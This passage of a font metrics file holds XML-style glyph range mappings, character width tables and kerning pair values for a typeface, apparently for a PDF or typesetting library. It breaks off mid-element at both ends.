ue="214" us="214"/><bf gi="239" ue="215" us="215"/><bf gi="145" ue="216" us="216"/><bf gi="213" ue="217" us="217"/><bf gi="211" ue="219" us="218"/><bf gi="104" ue="220" us="220"/><bf gi="234" ue="221" us="221"/><bf gi="236" ue="222" us="222"/><bf gi="137" ue="223" us="223"/><bf gi="106" ue="224" us="224"/><bf gi="105" ue="225" us="225"/><bf gi="107" ue="226" us="226"/><bf gi="109" ue="227" us="227"/><bf gi="108" ue="228" us="228"/><bf gi="110" ue="229" us="229"/><bf gi="160" ue="230" us="230"/><bf gi="111" ue="231" us="231"/><bf gi="113" ue="232" us="232"/><bf gi="112" ue="233" us="233"/><bf gi="114" ue="235" us="234"/><bf gi="117" ue="236" us="236"/><bf gi="116" ue="237" us="237"/><bf gi="118" ue="239" us="238"/><bf gi="233" ue="240" us="240"/><bf gi="120" ue="241" us="241"/><bf gi="122" ue="242" us="242"/><bf gi="121" ue="243" us="243"/><bf gi="123" ue="244" us="244"/><bf gi="125" ue="245" us="245"/><bf gi="124" ue="246" us="246"/><bf gi="184" ue="247" us="247"/><bf gi="161" ue="248" us="248"/><bf gi="127" ue="249" us="249"/><bf gi="126" ue="250" us="250"/><bf gi="128" ue="252" us="251"/><bf gi="235" ue="253" us="253"/><bf gi="237" ue="254" us="254"/><bf gi="186" ue="255" us="255"/><bf gi="251" ue="263" us="262"/><bf gi="253" ue="269" us="268"/><bf gi="0" ue="270" us="270"/><bf gi="0" ue="271" us="271"/><bf gi="0" ue="272" us="272"/><bf gi="255" ue="273" us="273"/><bf gi="246" ue="287" us="286"/><bf gi="248" ue="304" us="304"/><bf gi="214" ue="305" us="305"/><bf gi="225" ue="322" us="321"/><bf gi="176" ue="339" us="338"/><bf gi="249" ue="351" us="350"/><bf gi="227" ue="353" us="352"/><bf gi="187" ue="376" us="376"/><bf gi="229" ue="382" us="381"/><bf gi="166" ue="402" us="402"/><bf gi="215" ue="710" us="710"/><bf gi="224" ue="711" us="711"/><bf gi="218" ue="730" us="728"/><bf gi="223" ue="731" us="731"/><bf gi="216" ue="732" us="732"/><bf gi="222" ue="733" us="733"/><bf gi="159" ue="937" us="937"/><bf gi="155" ue="960" us="960"/><bf gi="178" ue="8212" 
us="8211"/><bf gi="0" ue="8213" us="8213"/><bf gi="0" ue="8214" us="8214"/><bf gi="0" ue="8215" us="8215"/><bf gi="182" ue="8217" us="8216"/><bf gi="196" ue="8218" us="8218"/><bf gi="0" ue="8219" us="8219"/><bf gi="180" ue="8221" us="8220"/><bf gi="197" ue="8222" us="8222"/><bf gi="0" ue="8223" us="8223"/><bf gi="130" ue="8224" us="8224"/><bf gi="194" ue="8225" us="8225"/><bf gi="135" ue="8226" us="8226"/><bf gi="0" ue="8227" us="8227"/><bf gi="0" ue="8228" us="8228"/><bf gi="0" ue="8229" us="8229"/><bf gi="171" ue="8230" us="8230"/><bf gi="198" ue="8240" us="8240"/><bf gi="190" ue="8250" us="8249"/><bf gi="258" ue="8364" us="8364"/><bf gi="140" ue="8482" us="8482"/><bf gi="152" ue="8706" us="8706"/><bf gi="0" ue="8707" us="8707"/><bf gi="0" ue="8708" us="8708"/><bf gi="0" ue="8709" us="8709"/><bf gi="168" ue="8710" us="8710"/><bf gi="154" ue="8719" us="8719"/><bf gi="0" ue="8720" us="8720"/><bf gi="153" ue="8721" us="8721"/><bf gi="238" ue="8722" us="8722"/><bf gi="0" ue="8723" us="8723"/><bf gi="0" ue="8724" us="8724"/><bf gi="188" ue="8725" us="8725"/><bf gi="0" ue="8726" us="8726"/><bf gi="0" ue="8727" us="8727"/><bf gi="0" ue="8728" us="8728"/><bf gi="257" ue="8729" us="8729"/><bf gi="165" ue="8730" us="8730"/><bf gi="0" ue="8731" us="8731"/><bf gi="0" ue="8732" us="8732"/><bf gi="0" ue="8733" us="8733"/><bf gi="146" ue="8734" us="8734"/><bf gi="156" ue="8747" us="8747"/><bf gi="167" ue="8776" us="8776"/><bf gi="143" ue="8800" us="8800"/><bf gi="0" ue="8801" us="8801"/><bf gi="0" ue="8802" us="8802"/><bf gi="0" ue="8803" us="8803"/><bf gi="148" ue="8805" us="8804"/><bf gi="185" ue="9674" us="9674"/><bf gi="192" ue="64258" us="64257"/><bf gi="0" ue="65535" us="65535"/></bfranges><cid-widths start-index="0"><wx w="600"/><wx w="0"/><wx w="317"/><wx w="317"/><wx w="400"/><wx w="459"/><wx w="837"/><wx w="636"/><wx w="950"/><wx w="779"/><wx w="274"/><wx w="390"/><wx w="390"/><wx w="500"/><wx w="837"/><wx w="317"/><wx w="360"/><wx w="317"/><wx w="336"/><wx 
w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="336"/><wx w="336"/><wx w="837"/><wx w="837"/><wx w="837"/><wx w="530"/><wx w="1000"/><wx w="684"/><wx w="686"/><wx w="698"/><wx w="770"/><wx w="631"/><wx w="575"/><wx w="774"/><wx w="751"/><wx w="294"/><wx w="294"/><wx w="655"/><wx w="557"/><wx w="862"/><wx w="748"/><wx w="787"/><wx w="603"/><wx w="787"/><wx w="694"/><wx w="634"/><wx w="610"/><wx w="731"/><wx w="684"/><wx w="988"/><wx w="685"/><wx w="610"/><wx w="685"/><wx w="390"/><wx w="336"/><wx w="390"/><wx w="837"/><wx w="500"/><wx w="500"/><wx w="612"/><wx w="634"/><wx w="549"/><wx w="634"/><wx w="615"/><wx w="352"/><wx w="634"/><wx w="633"/><wx w="277"/><wx w="277"/><wx w="579"/><wx w="277"/><wx w="974"/><wx w="633"/><wx w="611"/><wx w="634"/><wx w="634"/><wx w="411"/><wx w="520"/><wx w="392"/><wx w="633"/><wx w="591"/><wx w="817"/><wx w="591"/><wx w="591"/><wx w="524"/><wx w="636"/><wx w="336"/><wx w="636"/><wx w="837"/><wx w="684"/><wx w="684"/><wx w="698"/><wx w="631"/><wx w="748"/><wx w="787"/><wx w="731"/><wx w="612"/><wx w="612"/><wx w="612"/><wx w="612"/><wx w="612"/><wx w="612"/><wx w="549"/><wx w="615"/><wx w="615"/><wx w="615"/><wx w="615"/><wx w="277"/><wx w="277"/><wx w="277"/><wx w="277"/><wx w="633"/><wx w="611"/><wx w="611"/><wx w="611"/><wx w="611"/><wx w="611"/><wx w="633"/><wx w="633"/><wx w="633"/><wx w="633"/><wx w="500"/><wx w="500"/><wx w="636"/><wx w="636"/><wx w="500"/><wx w="589"/><wx w="636"/><wx w="629"/><wx w="1000"/><wx w="1000"/><wx w="1000"/><wx w="500"/><wx w="500"/><wx w="837"/><wx w="974"/><wx w="787"/><wx w="833"/><wx w="837"/><wx w="837"/><wx w="837"/><wx w="636"/><wx w="636"/><wx w="517"/><wx w="673"/><wx w="756"/><wx w="588"/><wx w="520"/><wx w="471"/><wx w="471"/><wx w="764"/><wx w="981"/><wx w="611"/><wx w="530"/><wx w="400"/><wx w="837"/><wx w="637"/><wx w="636"/><wx w="837"/><wx w="668"/><wx w="611"/><wx w="611"/><wx w="1000"/><wx 
w="636"/><wx w="684"/><wx w="684"/><wx w="787"/><wx w="1069"/><wx w="1022"/><wx w="500"/><wx w="1000"/><wx w="518"/><wx w="518"/><wx w="317"/><wx w="317"/><wx w="837"/><wx w="494"/><wx w="591"/><wx w="610"/><wx w="166"/><wx w="636"/><wx w="399"/><wx w="399"/><wx w="629"/><wx w="629"/><wx w="500"/><wx w="317"/><wx w="317"/><wx w="518"/><wx w="1341"/><wx w="684"/><wx w="631"/><wx w="684"/><wx w="631"/><wx w="631"/><wx w="294"/><wx w="294"/><wx w="294"/><wx w="294"/><wx w="787"/><wx w="787"/><wx w="787"/><wx w="731"/><wx w="731"/><wx w="731"/><wx w="277"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="562"/><wx w="284"/><wx w="634"/><wx w="520"/><wx w="685"/><wx w="524"/><wx w="336"/><wx w="774"/><wx w="611"/><wx w="610"/><wx w="591"/><wx w="604"/><wx w="634"/><wx w="837"/><wx w="837"/><wx w="400"/><wx w="400"/><wx w="400"/><wx w="969"/><wx w="969"/><wx w="969"/><wx w="774"/><wx w="634"/><wx w="294"/><wx w="634"/><wx w="520"/><wx w="698"/><wx w="549"/><wx w="698"/><wx w="549"/><wx w="634"/><wx w="360"/><wx w="317"/><wx w="636"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="400"/><wx w="500"/><wx w="500"/></cid-widths></multibyte-extras><kerning kpx1="246"><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="169"/><pair kern="-26" kpx2="197"/><pair kern="-35" kpx2="55"/><pair kern="-49" kpx2="60"/><pair kern="-49" kpx2="187"/><pair kern="-21" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-49" kpx2="234"/></kerning><kerning kpx1="235"><pair kern="-142" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-146" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-72" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="43"><pair kern="-35" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-35" kpx2="197"/><pair kern="-30" kpx2="181"/></kerning><kerning kpx1="16"><pair kern="36" kpx2="246"/><pair kern="-17" kpx2="235"/><pair 
kern="-21" kpx2="199"/><pair kern="18" kpx2="123"/><pair kern="27" kpx2="208"/><pair kern="-118" kpx2="187"/><pair kern="-49" kpx2="59"/><pair kern="18" kpx2="124"/><pair kern="-21" kpx2="201"/><pair kern="-118" kpx2="60"/><pair kern="36" kpx2="52"/><pair kern="18" kpx2="125"/><pair kern="36" kpx2="42"/><pair kern="-118" kpx2="234"/><pair kern="18" kpx2="122"/><pair kern="27" kpx2="210"/><pair kern="-21" kpx2="36"/><pair kern="18" kpx2="82"/><pair kern="-40" kpx2="58"/><pair kern="-91" kpx2="55"/><pair kern="-17" kpx2="186"/><pair kern="27" kpx2="175"/><pair kern="27" kpx2="50"/><pair kern="27" kpx2="209"/><pair kern="27" kpx2="103"/><pair kern="-21" kpx2="98"/><pair kern="55" kpx2="45"/><pair kern="-21" kpx2="173"/><pair kern="-17" kpx2="92"/><pair kern="-26" kpx2="89"/><pair kern="18" kpx2="121"/><pair kern="-58" kpx2="57"/><pair kern="-35" kpx2="37"/><pair kern="-21" kpx2="174"/></kerning><kerning kpx1="112"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="123"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="251"><pair kern="-17" kpx2="169"/><pair kern="-17" kpx2="60"/><pair kern="-17" kpx2="187"/><pair kern="18" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-17" kpx2="234"/></kerning><kerning kpx1="213"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning><kerning kpx1="208"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" 
kpx2="234"/></kerning><kerning kpx1="187"><pair kern="-114" kpx2="126"/><pair kern="-137" kpx2="107"/><pair kern="-132" kpx2="72"/><pair kern="-77" kpx2="199"/><pair kern="-118" kpx2="16"/><pair kern="-132" kpx2="123"/><pair kern="-132" kpx2="112"/><pair kern="-54" kpx2="251"/><pair kern="-54" kpx2="208"/><pair kern="-132" kpx2="113"/><pair kern="-54" kpx2="180"/><pair kern="-137" kpx2="105"/><pair kern="-114" kpx2="129"/><pair kern="-132" kpx2="124"/><pair kern="-109" kpx2="169"/><pair kern="-77" kpx2="201"/><pair kern="-54" kpx2="253"/><pair kern="-137" kpx2="106"/><pair kern="-132" kpx2="29"/><pair kern="-132" kpx2="125"/><pair kern="-72" kpx2="170"/><pair kern="-132" kpx2="115"/><pair kern="-114" kpx2="88"/><pair kern="-132" kpx2="122"/><pair kern="-54" kpx2="100"/><pair kern="-137" kpx2="68"/><pair kern="-54" kpx2="210"/><pair kern="-77" kpx2="36"/><pair kern="-132" kpx2="82"/><pair kern="-132" kpx2="114"/><pair kern="-54" kpx2="175"/><pair kern="-114" kpx2="127"/><pair kern="-54" kpx2="50"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-137" kpx2="108"/><pair kern="-77" kpx2="98"/><pair kern="-35" kpx2="76"/><pair kern="-17" kpx2="181"/><pair kern="-202" kpx2="17"/><pair kern="-114" kpx2="128"/><pair kern="-77" kpx2="173"/><pair kern="-137" kpx2="109"/><pair kern="-128" kpx2="197"/><pair kern="-54" kpx2="38"/><pair kern="-132" kpx2="121"/><pair kern="-137" kpx2="110"/><pair kern="-77" kpx2="174"/></kerning><kerning kpx1="113"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="144"><pair kern="-40" kpx2="180"/><pair kern="-54" kpx2="197"/><pair kern="-44" kpx2="181"/></kerning><kerning kpx1="59"><pair kern="-72" kpx2="100"/><pair kern="-63" kpx2="210"/><pair kern="-17" kpx2="55"/><pair kern="-44" kpx2="114"/><pair kern="-44" kpx2="72"/><pair kern="-63" kpx2="175"/><pair kern="-49" kpx2="16"/><pair kern="-63" kpx2="50"/><pair kern="-63" kpx2="209"/><pair kern="-44" kpx2="112"/><pair kern="-72" kpx2="251"/><pair kern="-63" 
kpx2="103"/><pair kern="-63" kpx2="208"/><pair kern="-44" kpx2="113"/><pair kern="-40" kpx2="181"/><pair kern="-77" kpx2="180"/><pair kern="-54" kpx2="169"/><pair kern="-21" kpx2="197"/><pair kern="-72" kpx2="38"/><pair kern="-72" kpx2="253"/><pair kern="-44" kpx2="115"/></kerning><kerning kpx1="73"><pair kern="31" kpx2="180"/><pair kern="-17" kpx2="90"/><pair kern="-72" kpx2="17"/><pair kern="-17" kpx2="235"/><pair kern="-35" kpx2="169"/><pair kern="-114" kpx2="197"/><pair kern="-17" kpx2="186"/><pair kern="-17" kpx2="92"/><pair kern="-17" kpx2="87"/><pair kern="-54" kpx2="16"/><pair kern="-35" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="41"><pair kern="-17" kpx2="227"/><pair kern="-54" kpx2="126"/><pair kern="-91" kpx2="107"/><pair kern="-91" kpx2="235"/><pair kern="-54" kpx2="72"/><pair kern="-91" kpx2="199"/><pair kern="-35" kpx2="123"/><pair kern="-54" kpx2="112"/><pair kern="-54" kpx2="113"/><pair kern="-17" kpx2="54"/><pair kern="-21" kpx2="180"/><pair kern="-91" kpx2="105"/><pair kern="-54" kpx2="129"/><pair kern="-35" kpx2="124"/><pair kern="-91" kpx2="201"/><pair kern="-72" kpx2="85"/><pair kern="-91" kpx2="106"/><pair kern="-77" kpx2="29"/><pair kern="-35" kpx2="125"/><pair kern="-54" kpx2="115"/><pair kern="-54" kpx2="88"/><pair kern="-35" kpx2="122"/><pair kern="-91" kpx2="68"/><pair kern="-91" kpx2="36"/><pair kern="-35" kpx2="82"/><pair kern="-91" kpx2="186"/><pair kern="-17" kpx2="55"/><pair kern="-54" kpx2="114"/><pair kern="-54" kpx2="127"/><pair kern="-91" kpx2="108"/><pair kern="-91" kpx2="98"/><pair kern="-72" kpx2="76"/><pair kern="-160" kpx2="17"/><pair kern="-54" kpx2="128"/><pair kern="-91" kpx2="173"/><pair kern="-91" kpx2="109"/><pair kern="-183" kpx2="197"/><pair kern="-91" kpx2="92"/><pair kern="-35" kpx2="121"/><pair kern="-91" kpx2="110"/><pair kern="-91" kpx2="174"/><pair kern="-17" kpx2="249"/></kerning><kerning kpx1="124"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" 
kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="169"><pair kern="-17" kpx2="90"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="246"/><pair kern="-17" kpx2="235"/><pair kern="-17" kpx2="58"/><pair kern="-17" kpx2="186"/><pair kern="-54" kpx2="55"/><pair kern="-17" kpx2="251"/><pair kern="-72" kpx2="187"/><pair kern="-17" kpx2="39"/><pair kern="73" kpx2="144"/><pair kern="-17" kpx2="45"/><pair kern="-17" kpx2="92"/><pair kern="-17" kpx2="38"/><pair kern="-72" kpx2="60"/><pair kern="-17" kpx2="89"/><pair kern="-17" kpx2="253"/><pair kern="-54" kpx2="57"/><pair kern="-17" kpx2="37"/><pair kern="-17" kpx2="42"/><pair kern="-72" kpx2="234"/></kerning><kerning kpx1="201"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" 
kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="60"><pair kern="-114" kpx2="126"/><pair kern="-137" kpx2="107"/><pair kern="-132" kpx2="72"/><pair kern="-77" kpx2="199"/><pair kern="-118" kpx2="16"/><pair kern="-132" kpx2="123"/><pair kern="-132" kpx2="112"/><pair kern="-54" kpx2="251"/><pair kern="-54" kpx2="208"/><pair kern="-132" kpx2="113"/><pair kern="-54" kpx2="180"/><pair kern="-137" kpx2="105"/><pair kern="-114" kpx2="129"/><pair kern="-132" kpx2="124"/><pair kern="-109" kpx2="169"/><pair kern="-77" kpx2="201"/><pair kern="-54" kpx2="253"/><pair kern="-137" kpx2="106"/><pair kern="-132" kpx2="29"/><pair kern="-132" kpx2="125"/><pair kern="-72" kpx2="170"/><pair kern="-132" kpx2="115"/><pair kern="-114" kpx2="88"/><pair kern="-132" kpx2="122"/><pair kern="-54" kpx2="100"/><pair kern="-137" kpx2="68"/><pair kern="-54" kpx2="210"/><pair kern="-77" kpx2="36"/><pair kern="-132" kpx2="82"/><pair kern="-132" kpx2="114"/><pair kern="-54" kpx2="175"/><pair kern="-114" kpx2="127"/><pair kern="-54" kpx2="50"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-137" kpx2="108"/><pair kern="-77" kpx2="98"/><pair kern="-35" kpx2="76"/><pair kern="-17" kpx2="181"/><pair kern="-202" kpx2="17"/><pair kern="-114" kpx2="128"/><pair kern="-77" kpx2="173"/><pair kern="-137" kpx2="109"/><pair kern="-128" kpx2="197"/><pair kern="-54" kpx2="38"/><pair kern="-132" kpx2="121"/><pair kern="-137" kpx2="110"/><pair kern="-77" kpx2="174"/></kerning><kerning kpx1="85"><pair kern="-21" kpx2="254"/><pair kern="-21" kpx2="72"/><pair kern="-63" kpx2="16"/><pair kern="-21" kpx2="112"/><pair kern="-21" kpx2="123"/><pair kern="-17" kpx2="80"/><pair 
kern="-21" kpx2="113"/><pair kern="-17" kpx2="71"/><pair kern="-21" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-21" kpx2="252"/><pair kern="-21" kpx2="70"/><pair kern="-17" kpx2="85"/><pair kern="-17" kpx2="29"/><pair kern="-21" kpx2="125"/><pair kern="-21" kpx2="115"/><pair kern="-21" kpx2="111"/><pair kern="-21" kpx2="122"/><pair kern="-21" kpx2="82"/><pair kern="-17" kpx2="75"/><pair kern="-21" kpx2="114"/><pair kern="-26" kpx2="91"/><pair kern="-17" kpx2="81"/><pair kern="41" kpx2="181"/><pair kern="-91" kpx2="17"/><pair kern="-151" kpx2="197"/><pair kern="-17" kpx2="74"/><pair kern="-17" kpx2="84"/><pair kern="-21" kpx2="121"/><pair kern="-17" kpx2="247"/><pair kern="-17" kpx2="120"/></kerning><kerning kpx1="61"><pair kern="-17" kpx2="180"/><pair kern="-17" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-17" kpx2="181"/></kerning><kerning kpx1="234"><pair kern="-114" kpx2="126"/><pair kern="-137" kpx2="107"/><pair kern="-132" kpx2="72"/><pair kern="-77" kpx2="199"/><pair kern="-118" kpx2="16"/><pair kern="-132" kpx2="123"/><pair kern="-132" kpx2="112"/><pair kern="-54" kpx2="251"/><pair kern="-54" kpx2="208"/><pair kern="-132" kpx2="113"/><pair kern="-54" kpx2="180"/><pair kern="-137" kpx2="105"/><pair kern="-114" kpx2="129"/><pair kern="-132" kpx2="124"/><pair kern="-109" kpx2="169"/><pair kern="-77" kpx2="201"/><pair kern="-54" kpx2="253"/><pair kern="-137" kpx2="106"/><pair kern="-132" kpx2="29"/><pair kern="-132" kpx2="125"/><pair kern="-72" kpx2="170"/><pair kern="-132" kpx2="115"/><pair kern="-114" kpx2="88"/><pair kern="-132" kpx2="122"/><pair kern="-54" kpx2="100"/><pair kern="-137" kpx2="68"/><pair kern="-54" kpx2="210"/><pair kern="-77" kpx2="36"/><pair kern="-132" kpx2="82"/><pair kern="-132" kpx2="114"/><pair kern="-54" kpx2="175"/><pair kern="-114" kpx2="127"/><pair kern="-54" kpx2="50"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-137" kpx2="108"/><pair kern="-77" kpx2="98"/><pair kern="-35" 
kpx2="76"/><pair kern="-17" kpx2="181"/><pair kern="-202" kpx2="17"/><pair kern="-114" kpx2="128"/><pair kern="-77" kpx2="173"/><pair kern="-137" kpx2="109"/><pair kern="-128" kpx2="197"/><pair kern="-54" kpx2="38"/><pair kern="-132" kpx2="121"/><pair kern="-137" kpx2="110"/><pair kern="-77" kpx2="174"/></kerning><kerning kpx1="100"><pair kern="-17" kpx2="169"/><pair kern="-17" kpx2="60"/><pair kern="-17" kpx2="187"/><pair kern="18" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-17" kpx2="234"/></kerning><kerning kpx1="122"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="47"><pair kern="-17" kpx2="126"/><pair kern="-91" kpx2="235"/><pair kern="-49" kpx2="104"/><pair kern="-17" kpx2="72"/><pair kern="22" kpx2="199"/><pair kern="-17" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-49" kpx2="213"/><pair kern="-35" kpx2="208"/><pair kern="-132" kpx2="187"/><pair kern="-17" kpx2="113"/><pair kern="-202" kpx2="180"/><pair kern="-17" kpx2="129"/><pair kern="-17" kpx2="124"/><pair kern="22" kpx2="201"/><pair kern="-132" kpx2="60"/><pair kern="-49" kpx2="211"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="115"/><pair kern="-132" kpx2="234"/><pair kern="-17" kpx2="88"/><pair kern="-17" kpx2="122"/><pair kern="-35" kpx2="210"/><pair kern="22" kpx2="36"/><pair kern="-17" kpx2="82"/><pair kern="-91" kpx2="58"/><pair kern="-91" kpx2="186"/><pair kern="-137" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-35" kpx2="175"/><pair kern="-17" kpx2="127"/><pair kern="-35" kpx2="50"/><pair kern="-35" kpx2="209"/><pair kern="-35" kpx2="103"/><pair kern="22" kpx2="98"/><pair kern="-262" kpx2="181"/><pair kern="-17" kpx2="128"/><pair kern="22" kpx2="173"/><pair kern="-49" kpx2="212"/><pair kern="-91" kpx2="92"/><pair kern="-17" kpx2="121"/><pair kern="-109" kpx2="57"/><pair kern="22" 
kpx2="174"/><pair kern="-49" kpx2="56"/></kerning><kerning kpx1="210"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="58"><pair kern="-35" kpx2="126"/><pair kern="-63" kpx2="107"/><pair kern="-17" kpx2="235"/><pair kern="-58" kpx2="72"/><pair kern="-54" kpx2="199"/><pair kern="-40" kpx2="16"/><pair kern="-58" kpx2="112"/><pair kern="-58" kpx2="123"/><pair kern="-58" kpx2="113"/><pair kern="-17" kpx2="180"/><pair kern="-63" kpx2="105"/><pair kern="-35" kpx2="129"/><pair kern="-58" kpx2="124"/><pair kern="-54" kpx2="169"/><pair kern="-54" kpx2="201"/><pair kern="-44" kpx2="85"/><pair kern="-63" kpx2="106"/><pair kern="-58" kpx2="29"/><pair kern="-58" kpx2="125"/><pair kern="-17" kpx2="170"/><pair kern="-58" kpx2="115"/><pair kern="-35" kpx2="88"/><pair kern="-58" kpx2="122"/><pair kern="-63" kpx2="68"/><pair kern="-54" kpx2="36"/><pair kern="-58" kpx2="82"/><pair kern="-17" kpx2="186"/><pair kern="-58" kpx2="114"/><pair kern="-35" kpx2="127"/><pair kern="-63" kpx2="108"/><pair kern="-54" kpx2="98"/><pair kern="-21" kpx2="76"/><pair kern="-114" kpx2="17"/><pair kern="-35" kpx2="128"/><pair kern="-54" kpx2="173"/><pair kern="-63" kpx2="109"/><pair kern="-128" kpx2="197"/><pair kern="-17" kpx2="92"/><pair kern="-58" kpx2="121"/><pair kern="-63" kpx2="110"/><pair kern="-54" kpx2="174"/></kerning><kerning kpx1="82"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" 
kpx2="181"/></kerning><kerning kpx1="186"><pair kern="-142" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-146" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-72" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="175"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="209"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="103"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" 